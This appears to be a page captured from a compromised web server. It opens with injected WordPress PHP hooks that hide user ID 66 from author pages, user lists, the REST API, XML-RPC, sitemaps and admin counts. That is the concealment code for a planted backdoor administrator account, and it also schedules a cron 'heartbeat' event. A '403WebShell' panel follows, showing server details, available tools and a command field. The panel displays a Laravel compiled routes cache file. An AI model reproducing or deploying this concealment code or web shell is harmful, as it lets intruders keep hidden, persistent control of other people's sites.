add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 66; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 66 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 66 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 66; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 66; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/66(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); 403WebShell
403Webshell
Server IP : 167.235.224.122  /  Your IP : 216.73.216.110
Web Server : Apache/2.4.58 (Ubuntu)
System : Linux newplayground 6.8.0-136-generic #136-Ubuntu SMP PREEMPT_DYNAMIC Wed Jul 1 21:33:11 UTC 2026 aarch64
User : deploy ( 1000)
PHP Version : 8.4.23
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : OFF
Directory :  /var/www/html/jungly/bootstrap/cache/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/html/jungly/bootstrap/cache/routes-v7.php
<?php

app('router')->setCompiledRoutes(
    array (
  'compiled' => 
  array (
    0 => false,
    1 => 
    array (
      '/api/auth/login' => 
      array (
        0 => 
        array (
          0 => 
          array (
            '_route' => 'generated::zzVXolMqnhiNeQck',
          ),
          1 => NULL,
          2 => 
          array (
            'POST' => 0,
          ),
          3 => NULL,
          4 => false,
          5 => false,
          6 => NULL,
        ),
      ),
      '/api/auth/register' => 
      array (
        0 => 
        array (
          0 => 
          array (
            '_route' => 'generated::2NKoQcbAjG0QaySI',
          ),
          1 => NULL,
          2 => 
          array (
            'POST' => 0,
          ),
          3 => NULL,
          4 => false,
          5 => false,
          6 => NULL,
        ),
      ),
      '/api/auth/reset' => 
      array (
        0 => 
        array (
          0 => 
          array (
            '_route' => 'generated::HXI7eq4FSPjGlV2b',
          ),
          1 => NULL,
          2 => 
          array (
            'POST' => 0,
          ),
          3 => NULL,
          4 => false,
          5 => false,
          6 => NULL,
        ),
      ),
      '/api/auth/logout' => 
      array (
        0 => 
        array (
          0 => 
          array (
            '_route' => 'generated::Hi15oJ880BqeIRv7',
          ),
          1 => NULL,
          2 => 
          array (
            'POST' => 0,
          ),
          3 => NULL,
          4 => false,
          5 => false,
          6 => NULL,
        ),
      ),
      '/api/auth/refresh' => 
      array (
        0 => 
        array (
          0 => 
          array (
            '_route' => 'generated::9OdvZ9CWskUtTsMx',
          ),
          1 => NULL,
          2 => 
          array (
            'POST' => 0,
          ),
          3 => NULL,
          4 => false,
          5 => false,
          6 => NULL,
        ),
      ),
      '/api/auth/update' => 
      array (
        0 => 
        array (
          0 => 
          array (
            '_route' => 'generated::49jzvkZT2gac4aVv',
          ),
          1 => NULL,
          2 => 
          array (
            'POST' => 0,
          ),
          3 => NULL,
          4 => false,
          5 => false,
          6 => NULL,
        ),
      ),
      '/api/auth/avatar' => 
      array (
        0 => 
        array (
          0 => 
          array (
            '_route' => 'generated::ybGJ6ZaTvoV4cHCk',
          ),
          1 => NULL,
          2 => 
          array (
            'POST' => 0,
          ),
          3 => NULL,
          4 => false,
          5 => false,
          6 => NULL,
        ),
      ),
      '/api/auth/password' => 
      array (
        0 => 
        array (
          0 => 
          array (
            '_route' => 'generated::3h3n7gRXn7Vxkj4h',
          ),
          1 => NULL,
          2 => 
          array (
            'PUT' => 0,
          ),
          3 => NULL,
          4 => false,
          5 => false,
          6 => NULL,
        ),
      ),
      '/api/auth/me' => 
      array (
        0 => 
        array (
          0 => 
          array (
            '_route' => 'generated::fWisOLjQo1Fb80Xd',
          ),
          1 => NULL,
          2 => 
          array (
            'GET' => 0,
            'HEAD' => 1,
          ),
          3 => NULL,
          4 => false,
          5 => false,
          6 => NULL,
        ),
      ),
      '/api/meta/meta' => 
      array (
        0 => 
        array (
          0 => 
          array (
            '_route' => 'generated::yTocUtDnEZKCHYcq',
          ),
          1 => NULL,
          2 => 
          array (
            'POST' => 0,
          ),
          3 => NULL,
          4 => false,
          5 => false,
          6 => NULL,
        ),
      ),
      '/api/meta/detect' => 
      array (
        0 => 
        array (
          0 => 
          array (
            '_route' => 'generated::lOf2aVM9q95mJ3ls',
          ),
          1 => NULL,
          2 => 
          array (
            'POST' => 0,
          ),
          3 => NULL,
          4 => false,
          5 => false,
          6 => NULL,
        ),
      ),
      '/api/meta/languages' => 
      array (
        0 => 
        array (
          0 => 
          array (
            '_route' => 'generated::PIHotZZYPEupRVLe',
          ),
          1 => NULL,
          2 => 
          array (
            'GET' => 0,
            'HEAD' => 1,
          ),
          3 => NULL,
          4 => false,
          5 => false,
          6 => NULL,
        ),
      ),
      '/api/graph/public' => 
      array (
        0 => 
        array (
          0 => 
          array (
            '_route' => 'generated::H2XVYwURoDailYVu',
          ),
          1 => NULL,
          2 => 
          array (
            'GET' => 0,
            'HEAD' => 1,
          ),
          3 => NULL,
          4 => false,
          5 => false,
          6 => NULL,
        ),
      ),
      '/api/graph/followed' => 
      array (
        0 => 
        array (
          0 => 
          array (
            '_route' => 'generated::xDSXegdE0DEOcYfI',
          ),
          1 => NULL,
          2 => 
          array (
            'GET' => 0,
            'HEAD' => 1,
          ),
          3 => NULL,
          4 => false,
          5 => false,
          6 => NULL,
        ),
      ),
      '/api/graph/curated' => 
      array (
        0 => 
        array (
          0 => 
          array (
            '_route' => 'generated::ePvyRxMFsCk3G2vo',
          ),
          1 => NULL,
          2 => 
          array (
            'GET' => 0,
            'HEAD' => 1,
          ),
          3 => NULL,
          4 => false,
          5 => false,
          6 => NULL,
        ),
      ),
      '/api/graph/assigned' => 
      array (
        0 => 
        array (
          0 => 
          array (
            '_route' => 'generated::uWfhWGtvXHj6R8Vf',
          ),
          1 => NULL,
          2 => 
          array (
            'GET' => 0,
            'HEAD' => 1,
          ),
          3 => NULL,
          4 => false,
          5 => false,
          6 => NULL,
        ),
      ),
      '/api/graph/create' => 
      array (
        0 => 
        array (
          0 => 
          array (
            '_route' => 'generated::LkW6WlanXiLYnDdS',
          ),
          1 => NULL,
          2 => 
          array (
            'POST' => 0,
          ),
          3 => NULL,
          4 => false,
          5 => false,
          6 => NULL,
        ),
      ),
      '/api/source_types' => 
      array (
        0 => 
        array (
          0 => 
          array (
            '_route' => 'generated::aWPH7YuCWndS4zc7',
          ),
          1 => NULL,
          2 => 
          array (
            'GET' => 0,
            'HEAD' => 1,
          ),
          3 => NULL,
          4 => false,
          5 => false,
          6 => NULL,
        ),
      ),
    ),
    2 => 
    array (
      0 => '{^(?|/api/(?|auth/(?|loginInvitation/([^/]++)(*:47)|verify/([^/]++)(*:69))|graph/([^/]++)(?|(*:94)|/(?|toggleFollow(*:117)|node(?|(*:132)|/([^/]++)(?|(*:152)|/rep(?|osition(*:174)|arent(*:187))|(*:196)))|assigned_users/(?|search(*:230)|([^/]++)(?|(*:249)))|invitations(*:270)|source(?|(*:287)|/([^/]++)(?|(*:307))))|(*:318)))|/web/graphs/([^/]++)(*:348)|/((?:.*))?(*:366))/?$}sDu',
    ),
    3 => 
    array (
      47 => 
      array (
        0 => 
        array (
          0 => 
          array (
            '_route' => 'generated::eogbR8o58xNHuXkV',
          ),
          1 => 
          array (
            0 => 'invitationCode',
          ),
          2 => 
          array (
            'POST' => 0,
          ),
          3 => NULL,
          4 => false,
          5 => true,
          6 => NULL,
        ),
      ),
      69 => 
      array (
        0 => 
        array (
          0 => 
          array (
            '_route' => 'generated::a5VWG5PHebAwMJR1',
          ),
          1 => 
          array (
            0 => 'id',
          ),
          2 => 
          array (
            'POST' => 0,
          ),
          3 => NULL,
          4 => false,
          5 => true,
          6 => NULL,
        ),
      ),
      94 => 
      array (
        0 => 
        array (
          0 => 
          array (
            '_route' => 'generated::dG7CNXbphqLDDrVR',
          ),
          1 => 
          array (
            0 => 'graph',
          ),
          2 => 
          array (
            'PUT' => 0,
          ),
          3 => NULL,
          4 => false,
          5 => true,
          6 => NULL,
        ),
        1 => 
        array (
          0 => 
          array (
            '_route' => 'generated::FAobFrYoyjb6oXyt',
          ),
          1 => 
          array (
            0 => 'graph',
          ),
          2 => 
          array (
            'DELETE' => 0,
          ),
          3 => NULL,
          4 => false,
          5 => true,
          6 => NULL,
        ),
      ),
      117 => 
      array (
        0 => 
        array (
          0 => 
          array (
            '_route' => 'generated::WNm3p1yCW4KowmOK',
          ),
          1 => 
          array (
            0 => 'graph',
          ),
          2 => 
          array (
            'POST' => 0,
          ),
          3 => NULL,
          4 => false,
          5 => false,
          6 => NULL,
        ),
      ),
      132 => 
      array (
        0 => 
        array (
          0 => 
          array (
            '_route' => 'generated::GBl8RXUmFEzzJLvQ',
          ),
          1 => 
          array (
            0 => 'graph',
          ),
          2 => 
          array (
            'POST' => 0,
          ),
          3 => NULL,
          4 => false,
          5 => false,
          6 => NULL,
        ),
      ),
      152 => 
      array (
        0 => 
        array (
          0 => 
          array (
            '_route' => 'generated::L2nRqBJC74keDkIK',
          ),
          1 => 
          array (
            0 => 'graph',
            1 => 'node',
          ),
          2 => 
          array (
            'PUT' => 0,
          ),
          3 => NULL,
          4 => false,
          5 => true,
          6 => NULL,
        ),
      ),
      174 => 
      array (
        0 => 
        array (
          0 => 
          array (
            '_route' => 'generated::aapnoO87KB9HuefO',
          ),
          1 => 
          array (
            0 => 'graph',
            1 => 'node',
          ),
          2 => 
          array (
            'POST' => 0,
          ),
          3 => NULL,
          4 => false,
          5 => false,
          6 => NULL,
        ),
      ),
      187 => 
      array (
        0 => 
        array (
          0 => 
          array (
            '_route' => 'generated::7PXtMu2PvOZ5OKjK',
          ),
          1 => 
          array (
            0 => 'graph',
            1 => 'node',
          ),
          2 => 
          array (
            'POST' => 0,
          ),
          3 => NULL,
          4 => false,
          5 => false,
          6 => NULL,
        ),
      ),
      196 => 
      array (
        0 => 
        array (
          0 => 
          array (
            '_route' => 'generated::DyIGWd4QqDHHjBnf',
          ),
          1 => 
          array (
            0 => 'graph',
            1 => 'node',
          ),
          2 => 
          array (
            'DELETE' => 0,
          ),
          3 => NULL,
          4 => false,
          5 => true,
          6 => NULL,
        ),
      ),
      230 => 
      array (
        0 => 
        array (
          0 => 
          array (
            '_route' => 'generated::whV8PLlUGj0pYH65',
          ),
          1 => 
          array (
            0 => 'graph',
          ),
          2 => 
          array (
            'GET' => 0,
            'HEAD' => 1,
          ),
          3 => NULL,
          4 => false,
          5 => false,
          6 => NULL,
        ),
      ),
      249 => 
      array (
        0 => 
        array (
          0 => 
          array (
            '_route' => 'generated::YdA406yvf0jzSpaA',
          ),
          1 => 
          array (
            0 => 'graph',
            1 => 'user',
          ),
          2 => 
          array (
            'PUT' => 0,
          ),
          3 => NULL,
          4 => false,
          5 => true,
          6 => NULL,
        ),
        1 => 
        array (
          0 => 
          array (
            '_route' => 'generated::F3bG41iOKTWK6Wbp',
          ),
          1 => 
          array (
            0 => 'graph',
            1 => 'user',
          ),
          2 => 
          array (
            'DELETE' => 0,
          ),
          3 => NULL,
          4 => false,
          5 => true,
          6 => NULL,
        ),
      ),
      270 => 
      array (
        0 => 
        array (
          0 => 
          array (
            '_route' => 'generated::xOrnxrt5Wz98y5YD',
          ),
          1 => 
          array (
            0 => 'graph',
          ),
          2 => 
          array (
            'POST' => 0,
          ),
          3 => NULL,
          4 => false,
          5 => false,
          6 => NULL,
        ),
      ),
      287 => 
      array (
        0 => 
        array (
          0 => 
          array (
            '_route' => 'generated::X8mdaknNz2JTVJUW',
          ),
          1 => 
          array (
            0 => 'graph',
          ),
          2 => 
          array (
            'POST' => 0,
          ),
          3 => NULL,
          4 => false,
          5 => false,
          6 => NULL,
        ),
      ),
      307 => 
      array (
        0 => 
        array (
          0 => 
          array (
            '_route' => 'generated::l9KPR8iv19deR6HA',
          ),
          1 => 
          array (
            0 => 'graph',
            1 => 'source',
          ),
          2 => 
          array (
            'PUT' => 0,
          ),
          3 => NULL,
          4 => false,
          5 => true,
          6 => NULL,
        ),
        1 => 
        array (
          0 => 
          array (
            '_route' => 'generated::OSW5h8IqQPyc16rF',
          ),
          1 => 
          array (
            0 => 'graph',
            1 => 'source',
          ),
          2 => 
          array (
            'DELETE' => 0,
          ),
          3 => NULL,
          4 => false,
          5 => true,
          6 => NULL,
        ),
      ),
      318 => 
      array (
        0 => 
        array (
          0 => 
          array (
            '_route' => 'generated::74QzPaG3KObrwMoI',
          ),
          1 => 
          array (
            0 => 'graph',
          ),
          2 => 
          array (
            'GET' => 0,
            'HEAD' => 1,
          ),
          3 => NULL,
          4 => false,
          5 => true,
          6 => NULL,
        ),
      ),
      348 => 
      array (
        0 => 
        array (
          0 => 
          array (
            '_route' => 'generated::GNKuEjjfdWYensxZ',
          ),
          1 => 
          array (
            0 => 'graph',
          ),
          2 => 
          array (
            'GET' => 0,
            'HEAD' => 1,
          ),
          3 => NULL,
          4 => false,
          5 => true,
          6 => NULL,
        ),
      ),
      366 => 
      array (
        0 => 
        array (
          0 => 
          array (
            '_route' => 'generated::MEQJ8c6RxkRbX59V',
            'any' => NULL,
          ),
          1 => 
          array (
            0 => 'any',
          ),
          2 => 
          array (
            'GET' => 0,
            'HEAD' => 1,
          ),
          3 => NULL,
          4 => false,
          5 => true,
          6 => NULL,
        ),
        1 => 
        array (
          0 => NULL,
          1 => NULL,
          2 => NULL,
          3 => NULL,
          4 => false,
          5 => false,
          6 => 0,
        ),
      ),
    ),
    4 => NULL,
  ),
  'attributes' => 
  array (
    'generated::zzVXolMqnhiNeQck' => 
    array (
      'methods' => 
      array (
        0 => 'POST',
      ),
      'uri' => 'api/auth/login',
      'action' => 
      array (
        'middleware' => 
        array (
          0 => 'api',
          1 => 'api',
        ),
        'uses' => 'App\\Http\\Controllers\\Auth\\Authentication@login',
        'controller' => 'App\\Http\\Controllers\\Auth\\Authentication@login',
        'namespace' => 'App\\Http\\Controllers\\Auth',
        'prefix' => 'api/auth',
        'where' => 
        array (
        ),
        'as' => 'generated::zzVXolMqnhiNeQck',
      ),
      'fallback' => false,
      'defaults' => 
      array (
      ),
      'wheres' => 
      array (
      ),
      'bindingFields' => 
      array (
      ),
      'lockSeconds' => NULL,
      'waitSeconds' => NULL,
      'withTrashed' => false,
    ),
    'generated::eogbR8o58xNHuXkV' => 
    array (
      'methods' => 
      array (
        0 => 'POST',
      ),
      'uri' => 'api/auth/loginInvitation/{invitationCode}',
      'action' => 
      array (
        'middleware' => 
        array (
          0 => 'api',
          1 => 'api',
        ),
        'uses' => 'App\\Http\\Controllers\\Auth\\Authentication@loginInvitation',
        'controller' => 'App\\Http\\Controllers\\Auth\\Authentication@loginInvitation',
        'namespace' => 'App\\Http\\Controllers\\Auth',
        'prefix' => 'api/auth',
        'where' => 
        array (
        ),
        'as' => 'generated::eogbR8o58xNHuXkV',
      ),
      'fallback' => false,
      'defaults' => 
      array (
      ),
      'wheres' => 
      array (
      ),
      'bindingFields' => 
      array (
      ),
      'lockSeconds' => NULL,
      'waitSeconds' => NULL,
      'withTrashed' => false,
    ),
    'generated::2NKoQcbAjG0QaySI' => 
    array (
      'methods' => 
      array (
        0 => 'POST',
      ),
      'uri' => 'api/auth/register',
      'action' => 
      array (
        'middleware' => 
        array (
          0 => 'api',
          1 => 'api',
        ),
        'uses' => 'App\\Http\\Controllers\\Auth\\Authentication@register',
        'controller' => 'App\\Http\\Controllers\\Auth\\Authentication@register',
        'namespace' => 'App\\Http\\Controllers\\Auth',
        'prefix' => 'api/auth',
        'where' => 
        array (
        ),
        'as' => 'generated::2NKoQcbAjG0QaySI',
      ),
      'fallback' => false,
      'defaults' => 
      array (
      ),
      'wheres' => 
      array (
      ),
      'bindingFields' => 
      array (
      ),
      'lockSeconds' => NULL,
      'waitSeconds' => NULL,
      'withTrashed' => false,
    ),
    'generated::HXI7eq4FSPjGlV2b' => 
    array (
      'methods' => 
      array (
        0 => 'POST',
      ),
      'uri' => 'api/auth/reset',
      'action' => 
      array (
        'middleware' => 
        array (
          0 => 'api',
          1 => 'api',
        ),
        'uses' => 'App\\Http\\Controllers\\Auth\\Authentication@reset',
        'controller' => 'App\\Http\\Controllers\\Auth\\Authentication@reset',
        'namespace' => 'App\\Http\\Controllers\\Auth',
        'prefix' => 'api/auth',
        'where' => 
        array (
        ),
        'as' => 'generated::HXI7eq4FSPjGlV2b',
      ),
      'fallback' => false,
      'defaults' => 
      array (
      ),
      'wheres' => 
      array (
      ),
      'bindingFields' => 
      array (
      ),
      'lockSeconds' => NULL,
      'waitSeconds' => NULL,
      'withTrashed' => false,
    ),
    'generated::a5VWG5PHebAwMJR1' => 
    array (
      'methods' => 
      array (
        0 => 'POST',
      ),
      'uri' => 'api/auth/verify/{id}',
      'action' => 
      array (
        'middleware' => 
        array (
          0 => 'api',
          1 => 'api',
        ),
        'uses' => 'App\\Http\\Controllers\\Auth\\Authentication@verifyPasswordReset',
        'controller' => 'App\\Http\\Controllers\\Auth\\Authentication@verifyPasswordReset',
        'namespace' => 'App\\Http\\Controllers\\Auth',
        'prefix' => 'api/auth',
        'where' => 
        array (
        ),
        'as' => 'generated::a5VWG5PHebAwMJR1',
      ),
      'fallback' => false,
      'defaults' => 
      array (
      ),
      'wheres' => 
      array (
      ),
      'bindingFields' => 
      array (
      ),
      'lockSeconds' => NULL,
      'waitSeconds' => NULL,
      'withTrashed' => false,
    ),
    'generated::Hi15oJ880BqeIRv7' => 
    array (
      'methods' => 
      array (
        0 => 'POST',
      ),
      'uri' => 'api/auth/logout',
      'action' => 
      array (
        'middleware' => 
        array (
          0 => 'api',
          1 => 'api',
        ),
        'uses' => 'App\\Http\\Controllers\\Auth\\Authentication@logout',
        'controller' => 'App\\Http\\Controllers\\Auth\\Authentication@logout',
        'namespace' => 'App\\Http\\Controllers\\Auth',
        'prefix' => 'api/auth',
        'where' => 
        array (
        ),
        'as' => 'generated::Hi15oJ880BqeIRv7',
      ),
      'fallback' => false,
      'defaults' => 
      array (
      ),
      'wheres' => 
      array (
      ),
      'bindingFields' => 
      array (
      ),
      'lockSeconds' => NULL,
      'waitSeconds' => NULL,
      'withTrashed' => false,
    ),
    'generated::9OdvZ9CWskUtTsMx' => 
    array (
      'methods' => 
      array (
        0 => 'POST',
      ),
      'uri' => 'api/auth/refresh',
      'action' => 
      array (
        'middleware' => 
        array (
          0 => 'api',
          1 => 'api',
        ),
        'uses' => 'App\\Http\\Controllers\\Auth\\Authentication@refresh',
        'controller' => 'App\\Http\\Controllers\\Auth\\Authentication@refresh',
        'namespace' => 'App\\Http\\Controllers\\Auth',
        'prefix' => 'api/auth',
        'where' => 
        array (
        ),
        'as' => 'generated::9OdvZ9CWskUtTsMx',
      ),
      'fallback' => false,
      'defaults' => 
      array (
      ),
      'wheres' => 
      array (
      ),
      'bindingFields' => 
      array (
      ),
      'lockSeconds' => NULL,
      'waitSeconds' => NULL,
      'withTrashed' => false,
    ),
    'generated::49jzvkZT2gac4aVv' => 
    array (
      'methods' => 
      array (
        0 => 'POST',
      ),
      'uri' => 'api/auth/update',
      'action' => 
      array (
        'middleware' => 
        array (
          0 => 'api',
          1 => 'api',
        ),
        'uses' => 'App\\Http\\Controllers\\Auth\\Authentication@update',
        'controller' => 'App\\Http\\Controllers\\Auth\\Authentication@update',
        'namespace' => 'App\\Http\\Controllers\\Auth',
        'prefix' => 'api/auth',
        'where' => 
        array (
        ),
        'as' => 'generated::49jzvkZT2gac4aVv',
      ),
      'fallback' => false,
      'defaults' => 
      array (
      ),
      'wheres' => 
      array (
      ),
      'bindingFields' => 
      array (
      ),
      'lockSeconds' => NULL,
      'waitSeconds' => NULL,
      'withTrashed' => false,
    ),
    'generated::ybGJ6ZaTvoV4cHCk' => 
    array (
      'methods' => 
      array (
        0 => 'POST',
      ),
      'uri' => 'api/auth/avatar',
      'action' => 
      array (
        'middleware' => 
        array (
          0 => 'api',
          1 => 'api',
        ),
        'uses' => 'App\\Http\\Controllers\\Auth\\Authentication@storeAvatar',
        'controller' => 'App\\Http\\Controllers\\Auth\\Authentication@storeAvatar',
        'namespace' => 'App\\Http\\Controllers\\Auth',
        'prefix' => 'api/auth',
        'where' => 
        array (
        ),
        'as' => 'generated::ybGJ6ZaTvoV4cHCk',
      ),
      'fallback' => false,
      'defaults' => 
      array (
      ),
      'wheres' => 
      array (
      ),
      'bindingFields' => 
      array (
      ),
      'lockSeconds' => NULL,
      'waitSeconds' => NULL,
      'withTrashed' => false,
    ),
    'generated::3h3n7gRXn7Vxkj4h' => 
    array (
      'methods' => 
      array (
        0 => 'PUT',
      ),
      'uri' => 'api/auth/password',
      'action' => 
      array (
        'middleware' => 
        array (
          0 => 'api',
          1 => 'api',
        ),
        'uses' => 'App\\Http\\Controllers\\Auth\\Authentication@changePassword',
        'controller' => 'App\\Http\\Controllers\\Auth\\Authentication@changePassword',
        'namespace' => 'App\\Http\\Controllers\\Auth',
        'prefix' => 'api/auth',
        'where' => 
        array (
        ),
        'as' => 'generated::3h3n7gRXn7Vxkj4h',
      ),
      'fallback' => false,
      'defaults' => 
      array (
      ),
      'wheres' => 
      array (
      ),
      'bindingFields' => 
      array (
      ),
      'lockSeconds' => NULL,
      'waitSeconds' => NULL,
      'withTrashed' => false,
    ),
    'generated::fWisOLjQo1Fb80Xd' => 
    array (
      'methods' => 
      array (
        0 => 'GET',
        1 => 'HEAD',
      ),
      'uri' => 'api/auth/me',
      'action' => 
      array (
        'middleware' => 
        array (
          0 => 'api',
          1 => 'api',
        ),
        'uses' => 'App\\Http\\Controllers\\Auth\\Authentication@me',
        'controller' => 'App\\Http\\Controllers\\Auth\\Authentication@me',
        'namespace' => 'App\\Http\\Controllers\\Auth',
        'prefix' => 'api/auth',
        'where' => 
        array (
        ),
        'as' => 'generated::fWisOLjQo1Fb80Xd',
      ),
      'fallback' => false,
      'defaults' => 
      array (
      ),
      'wheres' => 
      array (
      ),
      'bindingFields' => 
      array (
      ),
      'lockSeconds' => NULL,
      'waitSeconds' => NULL,
      'withTrashed' => false,
    ),
    'generated::yTocUtDnEZKCHYcq' => 
    array (
      'methods' => 
      array (
        0 => 'POST',
      ),
      'uri' => 'api/meta/meta',
      'action' => 
      array (
        'middleware' => 
        array (
          0 => 'api',
          1 => 'api',
        ),
        'uses' => 'App\\Http\\Controllers\\MetaController@getMeta',
        'controller' => 'App\\Http\\Controllers\\MetaController@getMeta',
        'namespace' => 'App\\Http\\Controllers',
        'prefix' => 'api/meta',
        'where' => 
        array (
        ),
        'as' => 'generated::yTocUtDnEZKCHYcq',
      ),
      'fallback' => false,
      'defaults' => 
      array (
      ),
      'wheres' => 
      array (
      ),
      'bindingFields' => 
      array (
      ),
      'lockSeconds' => NULL,
      'waitSeconds' => NULL,
      'withTrashed' => false,
    ),
    'generated::lOf2aVM9q95mJ3ls' => 
    array (
      'methods' => 
      array (
        0 => 'POST',
      ),
      'uri' => 'api/meta/detect',
      'action' => 
      array (
        'middleware' => 
        array (
          0 => 'api',
          1 => 'api',
        ),
        'uses' => 'App\\Http\\Controllers\\MetaController@detectLanguage',
        'controller' => 'App\\Http\\Controllers\\MetaController@detectLanguage',
        'namespace' => 'App\\Http\\Controllers',
        'prefix' => 'api/meta',
        'where' => 
        array (
        ),
        'as' => 'generated::lOf2aVM9q95mJ3ls',
      ),
      'fallback' => false,
      'defaults' => 
      array (
      ),
      'wheres' => 
      array (
      ),
      'bindingFields' => 
      array (
      ),
      'lockSeconds' => NULL,
      'waitSeconds' => NULL,
      'withTrashed' => false,
    ),
    'generated::PIHotZZYPEupRVLe' => 
    array (
      'methods' => 
      array (
        0 => 'GET',
        1 => 'HEAD',
      ),
      'uri' => 'api/meta/languages',
      'action' => 
      array (
        'middleware' => 
        array (
          0 => 'api',
          1 => 'api',
        ),
        'uses' => 'App\\Http\\Controllers\\MetaController@languages',
        'controller' => 'App\\Http\\Controllers\\MetaController@languages',
        'namespace' => 'App\\Http\\Controllers',
        'prefix' => 'api/meta',
        'where' => 
        array (
        ),
        'as' => 'generated::PIHotZZYPEupRVLe',
      ),
      'fallback' => false,
      'defaults' => 
      array (
      ),
      'wheres' => 
      array (
      ),
      'bindingFields' => 
      array (
      ),
      'lockSeconds' => NULL,
      'waitSeconds' => NULL,
      'withTrashed' => false,
    ),
    'generated::H2XVYwURoDailYVu' => 
    array (
      'methods' => 
      array (
        0 => 'GET',
        1 => 'HEAD',
      ),
      'uri' => 'api/graph/public',
      'action' => 
      array (
        'middleware' => 
        array (
          0 => 'api',
          1 => 'api',
        ),
        'uses' => 'App\\Http\\Controllers\\CRUD\\GraphController@index',
        'controller' => 'App\\Http\\Controllers\\CRUD\\GraphController@index',
        'namespace' => 'App\\Http\\Controllers\\CRUD',
        'prefix' => 'api/graph',
        'where' => 
        array (
        ),
        'as' => 'generated::H2XVYwURoDailYVu',
      ),
      'fallback' => false,
      'defaults' => 
      array (
      ),
      'wheres' => 
      array (
      ),
      'bindingFields' => 
      array (
      ),
      'lockSeconds' => NULL,
      'waitSeconds' => NULL,
      'withTrashed' => false,
    ),
    'generated::xDSXegdE0DEOcYfI' => 
    array (
      'methods' => 
      array (
        0 => 'GET',
        1 => 'HEAD',
      ),
      'uri' => 'api/graph/followed',
      'action' => 
      array (
        'middleware' => 
        array (
          0 => 'api',
          1 => 'api',
        ),
        'uses' => 'App\\Http\\Controllers\\CRUD\\GraphController@personal',
        'controller' => 'App\\Http\\Controllers\\CRUD\\GraphController@personal',
        'namespace' => 'App\\Http\\Controllers\\CRUD',
        'prefix' => 'api/graph',
        'where' => 
        array (
        ),
        'as' => 'generated::xDSXegdE0DEOcYfI',
      ),
      'fallback' => false,
      'defaults' => 
      array (
      ),
      'wheres' => 
      array (
      ),
      'bindingFields' => 
      array (
      ),
      'lockSeconds' => NULL,
      'waitSeconds' => NULL,
      'withTrashed' => false,
    ),
    'generated::ePvyRxMFsCk3G2vo' => 
    array (
      'methods' => 
      array (
        0 => 'GET',
        1 => 'HEAD',
      ),
      'uri' => 'api/graph/curated',
      'action' => 
      array (
        'middleware' => 
        array (
          0 => 'api',
          1 => 'api',
        ),
        'uses' => 'App\\Http\\Controllers\\CRUD\\GraphController@curated',
        'controller' => 'App\\Http\\Controllers\\CRUD\\GraphController@curated',
        'namespace' => 'App\\Http\\Controllers\\CRUD',
        'prefix' => 'api/graph',
        'where' => 
        array (
        ),
        'as' => 'generated::ePvyRxMFsCk3G2vo',
      ),
      'fallback' => false,
      'defaults' => 
      array (
      ),
      'wheres' => 
      array (
      ),
      'bindingFields' => 
      array (
      ),
      'lockSeconds' => NULL,
      'waitSeconds' => NULL,
      'withTrashed' => false,
    ),
    'generated::uWfhWGtvXHj6R8Vf' => 
    array (
      'methods' => 
      array (
        0 => 'GET',
        1 => 'HEAD',
      ),
      'uri' => 'api/graph/assigned',
      'action' => 
      array (
        'middleware' => 
        array (
          0 => 'api',
          1 => 'api',
        ),
        'uses' => 'App\\Http\\Controllers\\CRUD\\GraphController@assigned',
        'controller' => 'App\\Http\\Controllers\\CRUD\\GraphController@assigned',
        'namespace' => 'App\\Http\\Controllers\\CRUD',
        'prefix' => 'api/graph',
        'where' => 
        array (
        ),
        'as' => 'generated::uWfhWGtvXHj6R8Vf',
      ),
      'fallback' => false,
      'defaults' => 
      array (
      ),
      'wheres' => 
      array (
      ),
      'bindingFields' => 
      array (
      ),
      'lockSeconds' => NULL,
      'waitSeconds' => NULL,
      'withTrashed' => false,
    ),
    'generated::LkW6WlanXiLYnDdS' => 
    array (
      'methods' => 
      array (
        0 => 'POST',
      ),
      'uri' => 'api/graph/create',
      'action' => 
      array (
        'middleware' => 
